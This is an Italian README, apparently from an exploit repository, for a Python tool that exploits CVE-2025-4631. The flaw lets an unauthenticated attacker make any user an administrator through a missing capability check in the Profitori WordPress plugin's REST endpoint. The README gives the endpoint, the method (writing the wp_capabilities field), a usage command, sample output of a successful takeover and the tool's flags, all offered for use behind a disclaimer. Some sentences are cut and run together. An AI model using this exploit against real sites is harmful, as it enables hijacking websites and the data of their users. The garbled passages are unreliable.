
Profitori 2.0.6.0 - 2.1.1.3 - Autorizzazione mancante per escalation di privilegi non autenticata
Il plugin Profitori (versioni dalla 2.0.6.0 alla 2.1.1.3) è vulnerabile a escalation dei privilegi non autenticata a causa di un controllo delle capacità mancante nell'endpoint /wp-json/stocktend/v1/stocktend_object. Ciò consente a un attaccante remoto di aumentare i privilegi degli utenti esistenti (o crearne di nuovi) manipolando direttamente il campo meta wp_capabilities.
Questo exploit in Python automatizza il processo di escalation dei privilegi:
readme.txt.Se il controllo della versione fallisce, l'exploit procede con cautela mostrando un avviso.

usage: CVE-2025-4631.py [-h] -u URL -id ID [--email EMAIL] [--name NAME] [--url_field URL_FIELD] [--verbose]
python CVE-2025-4631.py -u http://nxploit.ddev.site -id 3
[📄] Checking plugin version at: http://nxploit.ddev.site/wp-content/plugins/profitori/readme.txt
[✅] Vulnerable version detected: 2.1.1.3
[🚀] Exploiting in 3 seconds...
[📡] Sending privilege escalation request to: http://nxploit.ddev.site/wp-json/stocktend/v1/stocktend_object
[🎯] Exploit completed successfully!
[🧾] Updated User Information:
--------------------------------------
🆔 User ID : 3
👤 Username : subscriber
📧 Email : [email protected]
🪪 Display Name : Subscriber User
🔗 User URL :
🛡 Role Raw : a:1:{s:13:"administrator";b:1;}
[👑] Exploit By : Nxploited (Khaled_alenazi)
🔗 GitHub : https://github.com/Nxploited
📧 Email : [email protected]
requestsInstalla tramite:
pip install requests
Questo strumento è fornito solo per scopi educativi e di test autorizzati. Qualsiasi uso improprio di questo exploit contro sistemi che non possiedi o per i quali non hai esplicita autorizzazione a testare è severamente vietato. Il creatore non è responsabile per eventuali danni o conseguenze legali derivanti da un uso improprio.
DA: Nxploited ( Khaled_Alenazi )
| Flag | Description | Required |
|---|
-u, --url | 🌐 URL di base del sito WordPress | ✅ Sì |
-id | 🆔 ID dell'utente di cui elevare i privilegi | ✅ Sì |
--email | 📧 Email fittizia da visualizzare | ❌ No |
--name | 👤 Nome da visualizzare | ❌ No |
--url_field | 🔗 Campo URL utente | ❌ No |
--verbose | 🔍 Stampa la risposta JSON completa | ❌ No |